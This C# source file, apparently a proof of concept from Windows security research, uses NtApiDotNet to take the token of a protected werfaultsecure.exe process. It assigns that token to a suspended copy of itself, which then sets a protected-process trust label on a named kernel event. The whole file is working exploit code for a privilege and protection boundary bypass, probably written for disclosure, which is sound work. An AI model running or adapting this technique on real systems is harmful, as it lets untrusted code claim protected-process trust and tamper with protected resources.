﻿using NtApiDotNet;
using NtApiDotNet.Win32;
using System;
using System.Reflection;

namespace PPTest
{
    class Program
    {
        static NtToken GetTrustToken()
        {
            using (NtToken token = NtToken.OpenProcessToken(true))
            {
                Win32ProcessConfig config = new Win32ProcessConfig
                {
                    CommandLine = "werfaultsecure.exe",
                    CreationFlags = CreateProcessFlags.ProtectedProcess,
                    TerminateOnDispose = true
                };
                using (var process = Win32Process.CreateProcessAsUser(token, config))
                {
                    var prot = process.Process.Protection;
                    Console.WriteLine("WER Protection: {0} - {1}", prot.Type, prot.Signer);
                    using (NtToken primary = process.Process.OpenToken())
                    {
                        return primary.DuplicateToken();
                    }
                }
            }
        }

        static void Main(string[] args)
        {
            try
            {
                if (args.Length == 0)
                {
                    using (NtToken token = GetTrustToken())
                    {
                        Win32ProcessConfig config = new Win32ProcessConfig
                        {
                            ApplicationName = Assembly.GetExecutingAssembly().Location,
                            CommandLine = "poc arg",
                            CreationFlags = CreateProcessFlags.Suspended,
                            TerminateOnDispose = true
                        };
                        using (var process = Win32Process.CreateProcess(config))
                        {
                            process.Process.SetToken(token);
                            process.Process.Resume();
                            process.Process.Wait();
                        }
                    }
                }
                else
                {
                    using (NtEvent e = NtEvent.Create(@"\BaseNamedObjects\PPDEMO", EventType.NotificationEvent, false))
                    {
                        SecurityDescriptor sd = new SecurityDescriptor("S:(TL;;0x1;;;S-1-19-1024-8192)");
                        e.SetSecurityDescriptor(sd, SecurityInformation.ProcessTrustLabel);
                        if (e.GetSecurityDescriptor(SecurityInformation.ProcessTrustLabel).Sacl.Count > 0)
                        {
                            Console.WriteLine("Added trust label to event");
                        }
                        else
                        {
                            Console.WriteLine("Couldn't add trust label");
                        }
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }
        }
    }
}
